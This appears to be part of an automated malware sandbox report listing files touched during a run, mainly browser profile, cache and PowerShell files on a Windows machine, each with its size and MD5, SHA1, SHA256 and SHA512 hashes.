SHA1
d64fdc18addc609b64dc2141ec68cd122d34d6a5

SHA256
d9fe9acac7406105f4ee7747f3f4a6a8f5533954e281daf5130f9277f0737ac1

SHA512
9837d7a02653f62a795e89e6b99efb69a33aa726cf8c1bd1eb492a5c7998585b0538867a96ab739b6f63c316aea7021a79edb108b7f24a41df79c1cdc6525042

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1547d3a6f2f82f3e8cc6b1528deac8d7

SHA1
ff3f0a7ec398cf3875d799548a24cd1973bb951e

SHA256
b1ab6f05589c1d14b23b8872807c4765993cf76c99919bbfbe79368186f9b272

SHA512
9c1a9b204cbe5e9cc495d7db4a8948951ad03e495a0601d1f33523e3ae7a508b8e4d35ecebb4055fef75086bcdd281e319bd4904d1ce82f84f2195b5de9ed691

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
362de1d63c8a4d8d1f3fabd171f55185

SHA1
c55633c767d780bb22137df91cfbbcb58cde0222

SHA256
4990509c714ace059b99c7ee94292b1d4364074a416136c759dba449485cb56e

SHA512
4b10b985f22def12de15e3caaf761bc09fca746440852b813302099e895bc830e62085b6598c44b4219570201cf6eacba2f19b3d97c333cb3fea2b28f8622ea3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ced71cf0-0eee-4398-9e9c-dd1a3057ba0f\index-dir\the-real-index

Filesize
2KB

MD5
e014ebd78b5b1c1d2bfc20487b35821d

SHA1
3e6d9691a268d5eaa5f62b28dfe8ad2ae3c9e740

SHA256
698d39fd05a3e6d5794081f2386f792162a37a664f61ada428325935e8e52b2d

SHA512
db8fd8c73933de37817c819c777cd7f6e719f39edf2c331c311ba4ab46311712a537ceea8160659765d628bb7ccf652bad20caf1e4dce2361d54cc115e7f3734

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ced71cf0-0eee-4398-9e9c-dd1a3057ba0f\index-dir\the-real-index

Filesize
2KB

MD5
891f887138eedbeda9dfd38e3f3d61d7

SHA1
48078f762c3a6d7aeaed6dece7de1cfef18911a7

SHA256
297c476a2fae6a70e291c7a328b6df8cc34e2fa6d7999dc8c2c8aa3779936f6b

SHA512
0ef9d4767081c01a7f9b32c323245e03e8a11e9f9332265fbee65377f5219b02dd470dc481f0ff0ec5fb40c1a91a7ffcd83eade099e0718434edf4d6509ac940

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\ced71cf0-0eee-4398-9e9c-dd1a3057ba0f\index-dir\the-real-index~RFe5d9c81.TMP

Filesize
48B

MD5
fb6528fb636b2f919a163e7fb7003d53

SHA1
c7ca690d54495b6a7b31e3f425adf5858d64719e

SHA256
7912aa819ddfbc385544524f42e26ba5171d16b1b0cfe5ee3310aab9e5ff249a

SHA512
2449b850d62bcdf1402ea3991bd2a6cb1c7033f83924f0063d6dd6b5f894293df11e347fd707f41b8a1390e78ed33258eb907c1eeb80c690591fb2e17e91688c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\fd713513-635d-4679-8b61-891711e326e5\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\fd713513-635d-4679-8b61-891711e326e5\index-dir\the-real-index

Filesize
624B

MD5
5a0a9dd881db40ab596e325250a0c1fc

SHA1
c75efb537c7fc6add190af99f5d3832811aceedc

SHA256
dec088e18a44e66f9a3ec8cbebf7cfd7302bfc8b177e2f24463cc7053ff10102

SHA512
7c607b91f7ed2c35416c1d9b3b78102e06aa2fc70dcd63e89d5c06e5a1eda89c854fef208ee8a80cf7152da088241a57c62fed89f93f71827c6875118d6ab2b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\fd713513-635d-4679-8b61-891711e326e5\index-dir\the-real-index~RFe5dcdb3.TMP

Filesize
48B

MD5
ba27527be9217381fca233f6d73a15d6

SHA1
5ace4131e815fd93b7736bdb4a2ce17bf2513372

SHA256
694869dc9aa7de1c87798c99a2e04c1ab960544f173ff2b56d43358cb435f908

SHA512
2e677256b0e699ab5e39677c92154be533dc0a1392723d204ab33dd0e2f0f23553174fbb8139d9a6ce2ba286a66ca99b3e673df50850354b01d41d9f38a4dfa7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
004ab83c9e2a454c5dbe5773da1d7457

SHA1
1ab8cd51a1a3094e78dfade4a648a7df17769582

SHA256
5ed27a465f9e98c288244906965c164aea4df87b86215bb431e97566a1196e3e

SHA512
8ad281b15f5e29965aa42d8354844c9d31ef1d3a810dadcf119b949385bdab986c18bb12f669ca5a99cd325c1b3b5b22d702a852f4fe0f9fe6d818ea5a53324d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
187B

MD5
8b4f2677f6e3f78d0a83c232b3dd7898

SHA1
219120f11de5dc1ad7e9c99e2268ce1ea278d63a

SHA256
1f5f4fe7f67e5ddedeabe428ec0385285def860a24169cd00ca00ed941422b8d

SHA512
d12210be59cb82b5cb7509089ef968b5f277c1d2122756c70bd7085d778853c9dc1ea40dd916e3d915aed59f5617585625a8489f0d40869be4f4a30ec16e9d7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
88079a275619e71dc50008088f028db8

SHA1
24c1921893d946916a8662ea7f9eb996feac74bd

SHA256
c6c99c2ae642ad5593b4ba7437d7eaa2b143fa4f59f7975067e9e33d1bd0af8a

SHA512
4281b3da10767aca4db65631f6a308e7c6e5c0cf1532c2cec14d3c5916721c18ff9ff9656d51c98a4de0f1aa75e27be5e0620693c1c9e914bbf7efdb41cd31b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
ce2cfabec1a0acb3ce211838bb38400e

SHA1
94f0510c70f63a0f3e0117d03a0de9135e053077

SHA256
7468542ebe2a27b7fcf2b8ba1cebf4f9cd6f64c1130524e509cc20c0b4a037a3

SHA512
803ed718dcf24161f131e6e0a7b1506fc3e08912d3b56687e5b29c92187f69fbeba426a36fd4f1d66f264779599cacdb3931533336227c06dbcb879c32601cab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
e929fb7b2b9144bd461877ee5aba7cbe

SHA1
7b77480db5514d899169dc959ba71cd63f9013f1

SHA256
c6df3485191b64ab79df89ca531d2a2bb3b72711d68a5a7859d952bd175e41e9

SHA512
5703f6bb7e0c47e1de42bf600b87b0873afc1aa670e96b0b60c84beb79dee8a6f50db078b1e87771fc3d58b6e73b01cb37bb89343fa756a423bac642e893d83f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
178B

MD5
ce70d0346a5f5de64239e0b3a70002c9

SHA1
58ca601fc94db8c03569e8b6e9609be23ee17cb4

SHA256
7d11ef04a14cdd4ab10969e01f9c88bb358abdc552c2ee66105fbdaa34238ebc

SHA512
77461e95580433ad4819e269f112ae24e79def0eca3ed29ae54041d1241834c39a6b06c8d7deaa6d90077a1b986507401d13b1ec4e11f3540ceb3ce903815928

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5d88e9.TMP

Filesize
119B

MD5
9bdb089f3e600e77fde13f1630157bc1

SHA1
f728e00e247a2c6fd8d72d866f27dd5fc74dcef4

SHA256
cc52394cec6fee800d5d2d0987c985d832ef083d9c048703e11cf3f2cd6d6241

SHA512
36b3bbcf1a6be429817bcc01a2431745449a06c4df846fbabd711951b8a91fd6b4b631f80808f5e66593217fe655581f047f14b78aa5526bc29ebcb73f8587d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
b6d37776b7fd87a633479499abf0fd41

SHA1
21eb60ddee2a96b5f0962f8af06138d406437b32

SHA256
ae3b1a3a8cac54329ed4d4a32fcaeb6f9a91d96cd986ccecf49b571a88e81a58

SHA512
1792a76a2dd8e60df400eea90ffdb7edf92808d5560f5a077eb8dafb3635e50fd31bdd90c8703f1801a2de86c41e4843f06b8cede302e107aa8974fec3be1185

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

Filesize
668B

MD5
efc043b47a7ae2cbac431b85f992b443

SHA1
678181b466d60609273676cd5f2c53bc3625bb7a

SHA256
b7f5d700bcc828684b0ba15e394f88af1d3d565dc9bb707c8a3326d154f3ddf2

SHA512
a243f6b1f9936e35c9cbb34d970e3adb72bb4c9b63693950e472605fc3b2a7e4f7bc5247377f697eacaf75e30eac05639d0ed8baece1f53e0eac4defe7ef94d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4012_1956362321\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
206fd9669027c437a36fbf7d73657db7

SHA1
8dee68de4deac72e86bbb28b8e5a915df3b5f3a5

SHA256
0d17a989f42bc129aca8e755871a7025acb6292ce06ca2437e95bedbc328fa18

SHA512
2c89878ec8466edf1f214d918aefc6a9b3de46d06ffacff4fdb85566560e94068601b1e4377d9d2eabefdc1c7f09eb46b00cf4545e377cc84a69edf8e57e48b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4012_1956362321\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
529a0ad2f85dff6370e98e206ecb6ef9

SHA1
7a4ff97f02962afeca94f1815168f41ba54b0691

SHA256
31db550eb9c0d9afd316dc85cdfd832510e2c48e7d37d4a610c175667a4599c6

SHA512
d00e2d741a0a6321c92a4aab632f8f3bafd33c0e2875f37868e195ed5e7200a647b4c83358edcef5fc7acbc5c57f70410903f39eac76e23e88a342ac5c9c21cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4012_370575339\Icons Monochrome\16.png

Filesize
214B

MD5
1b3a4d1adc56ac66cd8b46c98f33e41b

SHA1
de87dc114f12e1865922f89ebc127966b0b9a1b7

SHA256
0fb35eacb91ab06f09431370f330ba290725119417f166facaf5f134499978bd

SHA512
ce89a67b088bae8dcd763f9a9b3655ed90485b24646d93de44533744dfcf947c96571e252d1ad80bdec1530ff2b72b012e8fff7178f1b4e957090f0f4c959e0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
194KB

MD5
37ffb74a1081c25a02a8fb5d3481e475

SHA1
00db251eaa14c69e0603ff138ba1df4367c9d28b

SHA256
2e51a3f93b6c2d19ecf5d61942dfa9de552f2ab074ecd61dc7787e2b9df697f8

SHA512
453f3770c1f7c95979afbcbaafe354d4244cd03c7bb478cb3fdd4f24a83aad24a5326758d011c969b4698c7221d13bcfce384a8b2e6a7601ec6a7c05abc41b3e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
e64611d6a93d7cdd3fe1348088c15f10

SHA1
1ea289c4bc5caffa8844c29c85675478a3400442

SHA256
9e5e603e839e93ad043ada3fc2e5e076b1fbd2feeb035f862a0bba3a8023f348

SHA512
89357c0fc9c729c9117ee8890917c08675d403f639a92974ef0837ec056bf44f250334505ca449ccdd9801c9fccca416a75be680f28f0a9f542f96fcb99a395d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4dd2754d1bea40445984d65abee82b21

SHA1
4b6a5658bae9a784a370a115fbb4a12e92bd3390

SHA256
183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d

SHA512
92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
67KB

MD5
a074f116c725add93a8a828fbdbbd56c

SHA1
88ca00a085140baeae0fd3072635afe3f841d88f

SHA256
4cdcda7d8363be5bc824064259780779e7c046d56399c8a191106f55ce2ed8a6

SHA512
43ed55cda35bde93fc93c408908ab126e512c45611a994d7f4e5c85d4f2d90d573066082cb7b8dffce6a24a1f96cd534586646719b214ac7874132163faa5f28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
41KB

MD5
a7ee007fb008c17e73216d0d69e254e8

SHA1
160d970e6a8271b0907c50268146a28b5918c05e

SHA256
414024b478738b35312a098bc7f911300b14396d34718f78886b5942d9afe346

SHA512
669bec67d3fc1932a921dd683e6acfdf462b9063e1726770bae8740d83503a799c2e30030f2aca7ec96df0bfd6d8b7f999f8296ee156533302161eb7c9747602

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
1.2MB

MD5
9f8f80ca4d9435d66dd761fbb0753642

SHA1
5f187d02303fd9044b9e7c74e0c02fe8e6a646b7

SHA256
ab481b8b19b3336deda1b9ad4680cce4958152c9f9daa60c7bd8eb6786887359

SHA512
9c0de8e5bf16f096bf781189d813eeb52c3c8ec73fc791de10a8781e9942de06ed30ff5021ab7385c98686330049e3e610adc3e484e12ef807eec58607cfae63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
b0cab1de4f935581d482b3ef02f57073

SHA1
ccd82bace391e42cc4c2e1dde38aaa3b2307d664

SHA256
8d026fafb1340f2d61913a28745a383153a9e6a85ac189ef7e6f5797cd715e85

SHA512
ff62d647ef41a0aac8f09a550939908c39b783857e1ab43aa5feb3cfa193cbbc3b762eee030ba39c84f7813166b21b8580e4a0887f92c0ad646686017daf31e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
859B

MD5
1a9a794dd7a795ebc4abbcea02975c4f

SHA1
c3a24b7c0d778cda1c2a74949ab1d0afa1717c89

SHA256
e1035869ec92ea906a83afd05df407cba8e45bbef874ef7cd6602362da24c249

SHA512
23025a1014739d8030713fbd4602fd48bc25ed6901dbb97e70d21e3438f44494c505383aed458bb4cbedb5f8cf37368101f93c993f17abacc4a06b23d5c980ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
0a38823a9091b45feede01b9ad7740d9

SHA1
e82d2db71edd13e930dbf5dd55e34e5dc228e71a

SHA256
ab314643903e46f16251946e8bfd1c945575cb2bf2d4bd85763a99f11951e22f

SHA512
6442e8a2a8d830e3a02b668963d73148ce0b61a55721ca1462790ce0e8ad7ca3a571d29d8bb91fdbd84b19ec29f244b7fc2b583a5bc7992e40a5b2caf6fed4b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
27e6e29112ac17450b089aa90f717d4f

SHA1
a3ab8982f2af197b2002964d0d21524f55fc9c71

SHA256
d5aa5afd46e8ac18159a75eb429af4d6e740d98b3a8142eb91f6a622c7eb55ee

SHA512
7a782b443b77c03724fca1b758330711523706ac7f991b9b8b0c275983a940413353d7c6e4b152792ddb55f93874a3d35e8bb771cbb9044f0c0bd3244d5f4270

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1f3c5ffb94e7cb147c7dca2c20a2eb63

SHA1
72e96806042744f2567145eb611e0940d9deb959

SHA256
2e612379cdea257a9a534cfdb0279b145dbb916500e561899d5a072991d28b66

SHA512
12c029da492d340b789d2ffa0ed4c0d28f2fd520d83b60c07f908dcf42c156a8c5a05f3df9b6268a960578bfc44632d4a6aea624ff19a9bd0160010ad79fe684

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
10426f1d2a8700836cee12af22598a62

SHA1
ad10b3663711c75858b109900ad4bb2d0eaf2005

SHA256
323e091cdab244871f7b988fc08b1c9d1dcd12a06a7f7633fd66739e230225c6

SHA512
b761908f9fc46e1786b6430a6a94d2530be64a0cead1493d797fbb28dcefead951736691506c04d46b49b2e44de01dd021d8cb635ec5fe30ddd9391c8ae45988

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1db61b8da78a41e4392d3d714bd21cfb

SHA1
9160d3a728d081ace25c6b10f7934d7233453d0f

SHA256
43a2b6374e4209a3bfd4cbe334501ba0e01491f94218e7793c92eacadc08e828

SHA512
6b5ebc42c96ba0cd12d6a35756781948e490a21f149eb6426e54cee3102907c6d17e3a45f6b699da7091d17aee55d8f3b23b94cb557353e996894d401af69b51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c98fc5e8fd3579b38ca62bf3d385063f

SHA1
6c0571c796ed911577ebf48c26b8761022a6b24b

SHA256
56be52951c11137d815efac252b6f98db0a822d78fbc9549e15f08ac55be4365

SHA512
95eeb676a1810043736b8eca2a10f3b5cc2df8cb6779c2f4ba8c9bf5e9ac5b9b93817d12e2f101b197c42ab0851dbf70a75343ebfc62b0b35d5ca74f4710793a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
10bad98652fe25a3b6ae9241cc74aef1

SHA1
e0f674d910817687713dfb674974f3d0791d8e1f

SHA256
16450369bb8c4b20fe1fa31c346c22221f5a86e4cb2bc4344f5b4b6d0eee0e57

SHA512
91a51f189fbd527f6081ad68a2d3a6f67a38dc6869647baf8847399abffb9225eea38e0a5f7000f65324a57d05383a470e159a4188344a535ec727db68d3340a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58949a.TMP

Filesize
873B

MD5
cd620b8431db76137d529211e3c589c4

SHA1
1af5dba08ca97704f633aea203a93a56da3bf985

SHA256
53b6cdc47a8e4822e3ce18abeecc3c36c14fa9cbc1aa8a74318d5d4d64c58ef6

SHA512
fbca49e79cabec43d7601b6adc13f54c0c34d9fdb26658d6009883d83e669bd4f2609b741432bea11ca19107d27eb02316dfcecbc6ee0b3b059d5fcfef2cead3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
b85f98971495ec39a63581a2851d3fdb

SHA1
4d76a9ded119742ebb1b75b74d3b1b58148e9cc5

SHA256
5c61ab2d1da5397e3078ad30e3c2847eca76627378db6d7a157c2df1e4538cd3

SHA512
209aaf43c21d91c4a272d67bf939fafb4454e05b3c91093c8fe9c456873ae5354e34d77ee3e072293111d724de699bc460db62016e7afa697b9b06673f80a33f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
73a130132acb214fa8381f309a5456e9

SHA1
2cd12a4c3c5f19bbdc8d0a80274539fcafee06c3

SHA256
e60acc0c99ddfd05003bdbdd7186e0570fa0421c03f85b0106a67381b7424664

SHA512
73f1fc80416ffd95a50aeef850ee2bd7c39be98f26c1fe643be21ca392fa9d5caa1d5ed95cc6f0d155265d43c70f701b6756f15f179f976afd23dba993c03203

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6fba96306bc6ea54a58dfc98a0241be8

SHA1
7fca9e4d0acb9e4ff8b617bbec95c54c4e5743db

SHA256
01a9685ad770698fee4417c7846a72b65073e9d233b03c17b339b4f86156dda0

SHA512
2b4a244ee932beb4c9698a058dd36c6d4d21317454921cb55f2fa4bfe1efd68f96104411e4f33a6e42a701d8768481a0608da03e4fcf50de47faf34846c807ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f26a31a4cc02431e698cc23c561101a

SHA1
1933ee46f0163e34b3fc4b46a3f57ac30c5e600c

SHA256
1f32e0e3b905052f898e948ad1c4289b73949892f893c34be377d181ca20f946

SHA512
d91e97271e0051818770af0ccc6be05d5046f94f24aba5bdf8be3853c3a4c10b522d4ea72bf4343fb895c5be97bd23b5fc12e247d010a8f715e97a3ebe24053d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a9725150c8400bf8023c6671a37eb561

SHA1
4cd6ddf574e66e050bcff972c4fa589a5681d489

SHA256
4b732ad5f05c545c9b5dab1ede2a28a905420916e959adf134883472d6549849

SHA512
add22f987e004d6a69be0e7f295ae9af797e3506755e32e11b6f01de8b2a551a28b174f0a04fb18afa671060638b533b7de944cd69056999e223cda6da91a45f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2419d068e09423d5e7edec9bb8010870

SHA1
445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

SHA256
d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

SHA512
053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\activity-stream.discovery_stream.json

Filesize
42KB

MD5
5288256fcd7d6f649a721c51318c78bb

SHA1
2de65cd9a0cfbc0383f79b654dfe585ecb8bcb7c

SHA256
b90371377793afa8e4c3e2c55364560529ad0018e0cacaa64a3676c24e97e430

SHA512
60c5e7feea1e62e428263ed16e9dd6d4c6374c65c09ed820e93dcd5b5cebc1365ae286126c89956ce87ed2d84549587d1f34ee75dbfc6b2b7c7772739605937f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A40.tmp\3A41.tmp\3A42.bat

Filesize
867B

MD5
addedb06062eef1e06beb01c81ede139

SHA1
fe92bda282254358c287991cd4020f393a3393fe

SHA256
98c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f

SHA512
a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5p0gdeb.ofq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\AlternateServices.bin

Filesize
7KB

MD5
5985844f3d840b3760309a75ef1af41c

SHA1
8b64ae776d2e23cfded3e0eb3658442d229a62ec

SHA256
0e7673e7f7433e05e98e4cbd6e121667f85c85b3542293de847453d9c655745b

SHA512
6ce390ee4015b6499c0d07c1aa784fa19056006e80022a8734c4115c6b9a54cc0d504a8331cec9dcfccd931b4323b345ecd637675ebcd9a360553c30eeae64ba

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
edb7c4b3be9b3081faf6b62bb5180a15

SHA1
bda5fc7204353944c5e93da04127293d619e9563

SHA256
49f3a39a1e1221c85dc1694919f1ea6a9b69a1361f5be149ecaf73aa3bb725b9

SHA512
7ce659eb8748b0d7f4f8c415fabbabd9dec66d9580ccd5684b498906c36eac07fae4e10e3ee3dc7e65c89afc54d4277019b438e79fc302c85e6872e25a26ceeb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pj0o4bl8.default-release\datareporting\glean\db\data.safe.tmp

Filesize
14KB

MD5
9c829f0c481636468678121fc47e21a0

SHA1
c235f47edaef5c27367a19824fd624ab9cceabc5

SHA256
d1de5f6487dd3c006e4437503f58d47d6908bdf96bb39673f9513713d72b1b8c

SHA512
923e0c15e5a2e0c42c77bb129a1bd13670d3c158727916596db1a4117929db3f8db21f91979849294dae0e15f4949592f9880b042fcb0c528780783352ad9df1

Download Submit
